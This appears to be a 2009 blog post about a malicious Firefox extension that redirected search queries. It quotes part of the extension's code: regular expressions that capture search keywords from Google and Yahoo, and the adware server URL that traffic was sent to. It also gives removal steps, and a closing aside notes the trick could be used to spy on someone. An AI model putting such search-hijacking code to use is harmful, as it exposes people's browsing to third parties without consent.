That Nasty Firefox Extension

February 26, 2009

So there has been a lot of noise on the interwebs about this new “malware”/”virus”/”worm” that apparently no anti-virus software has been able to detect or remove recently. Last week I was infected with this nasty little thing and it was really starting to piss me off. I had been searching madly across the Internet (using cached search pages, a little work around this bug) to try and find the solution to this little issue. I also ran every piece of malware and anti-virus software I have… which by the way is a lot.

After my holy-trinity of virus-killing software (Malwarebytes, Avira, and CCleaner) found nothing numerous times I was starting to get excessively frustrated. Then I came across a forum posts of Firefox users who all had the same issues… Turned out this was a Firefox specific problem (which of course I wouldn’t know because I never use IE, I assumed all was infected).

One user (bless him) said that this was an extension related issue, just find the extension folder that was modified around about the date you noticed the infections and remove it. Restart Firefox and it works without the problems. Me and my curious self… decided that I wanted to look at the code of this little thing.

So I dug in and copied the XUL (XML User Interface Language) file and opened it to see the code. These files, as a side, are used to change the user interface of Firefox, and are the reason that some extensions can make web pages change and do all the weird and cool things that we all seem to love… They are also the reason for my frustration over the past week..

So I open the file and look at the code and its very simple actually… Here are a few lines…

if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = ‘google’;
//    } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){
//        keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = ‘yahoo’;

There are actually a number of lines like this for every single browser. Simple regular expressions and checks the search engine. If it matches, then you are going to see these random redirects to some adserver, then to a page of their choosing… Found this little variable, which is apparently the server your requests are redirected to and changed.

var __d = “http://v1.adwarefeed.com/ffjs.php?u=1145892647-2942932799-2535655826-377724549a=998&s=3&v=icv270109ff&e=”;
I love the Internet, but I hate stuff like this out there. Anyways, Removal instructions are simple:

1.) Go to: %Mozzila Firefox%\extensions\

2.) Delete folder xxxxx where xxxxx is something like {CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA} and has a modified date around the time you got infected.

3.) Restart Firefox, problem solved.

And if you’re anything like me, look at the code for yourself and see exactly what it was doing… While nasty, its actually a pretty neat trick. Useful if you want to say… spy on someone using your internets. Oh, Change passwords if you’ve used any while being infected. Can never be too safe.